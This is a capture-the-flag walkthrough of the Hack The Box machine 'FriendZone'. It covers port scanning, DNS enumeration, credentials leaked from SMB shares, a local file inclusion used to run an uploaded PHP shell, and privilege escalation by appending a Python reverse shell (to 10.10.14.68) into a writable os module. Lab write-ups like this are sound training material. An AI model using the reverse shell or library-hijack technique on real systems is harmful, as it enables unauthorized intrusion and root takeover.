Nov 26, 2021
FriendZone — HTB
Friendzone was a fun box with a lot of rabbithole that you learned a lot from. Really interesting.
First we start with our nmap scan
nmap -sC -sV -A -p- 10.129.198.247
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.11.3–1ubuntu1.2 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu
Okay, so a lot of ports and a lot of things to enumerate but we take one thing at a time. We start of with FTP. Can’t authenticate anonymous and some default creds did not work
Port 53 is up next, we will use dig to go through the DNS of the server.
Now, this is where it gets interesting, from port 443 I can see that the IP has a CN of friendzone.red so I will add that in my /etc/hosts. Also, when I navigated towards port while having my gobuster in the background I saw the following:
Okay, cool so we have both friendzone.red and friendzoneportal.red
I will now add both in /etc/hosts and then perform dig.
Thats a lot of DNS records
friendzone.red
administrator1.friendzone.red
hr.friendzone.red
uploads.friendzone.red
friendzoneportal.red
admin.friendzoneportal.red
files.friendzoneportal.red
imports.friendzoneportal.red
vpn.friendzoneportal.red
Okay, so I will add all these to /etc/hosts
A lot of these ones look super interesting.
http://friendzone.net = nothing
https://freiendzone.net
this one gave us something interesting
Hmm, lets check that out
Ok, that’s base64
Resolves to:
dspONlSm3M163683263107RgfV1INj
Nothing more to find there.
Actually gives me a login page.
Tried with default creds but it’s not working..
Kept enumerating
https://uploads.friendzone.red/
Uploaded both php and jpg file with results
https://admin.friendzoneportal.red/
Gives a false login page, not working when I try creds
https://files.friendzoneportal.red
Nothing
https://imports.friendzoneportal.red/
https://vpn.friendzoneportal.red/
Both gave 404 not found
Okay, so nothing more there yet.
However, the server had SMB as well
Ok, we can access general and development
creds…
admin:WORKWORKHhallelujah@#
Lets look at development
Okay nothing… Maybe come in handy later because we have read/write acces..
Okay, I will test the admin credentials now
Okay, so I will upload my dog picture again to see if I can make sense out of this..
But no success in finding the image in uploads or anything..
However, the dashboard.php looks so suspicious in the URI when it takes the parameter..
So the URI we have after visiting the dashboard.php and adding the parameters image_id=a.jpg&pagename=timestamp as it says on the page we get
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
I had huge problems with this.. However, after some enumeration in my gobuster i saw “timestamp.php”
Ok, but when we enter it in the URL we get
And when we add .php after timestamp we get nothing…
This means that it ADDS .php extension directly and there must be a LFI here.
As we remember from the SMB enumeration, we couldnt access the Files SAMBA directory.
However, this was in /etc/Files
That means that general and development are most likely in /etc/development and /etc/general
I will upload my shell to Development
Now, this must mean that shell3.php is in /etc/Development.
So if we wanna trigger this file from LFI we must use shell3 and NOT shell3.php since the extension of php is added
We visit the following:
Then start our listener
After some manual enumeration we find an interesting file
Ok, cool this is apparently a password being used for the MySQL DB. Let’s try this password because password reusage is pretty common.
It worked! Now we just need to escalate to root
After som more enumeration I found a file in the /opt/server-admin folder that was named reporter.py
From the script we can see that it’s running python2 because print is in brackets like print(“test”) in python3 and python2 has print “test”.
Okay, so this script is not really running any commands but do import the OS module from Python. If we could by any chance tamper with the module and put our own python code into it, then we could deploy a reverse shell.
First, lets investigate the binary and find where the binary is
Now we have the path from the file that imports os. Let’s look at the file now
Okay this is really good news, we have full permissions on the file which means that we can put whatever code inside it and hijack the library.
So let’s create a reverse shell and append it to the file
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((“10.10.14.68”, 445))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
import ptypty.spawn(“/bin/bash”)
Now we wait 2 minute and bam we’re root!
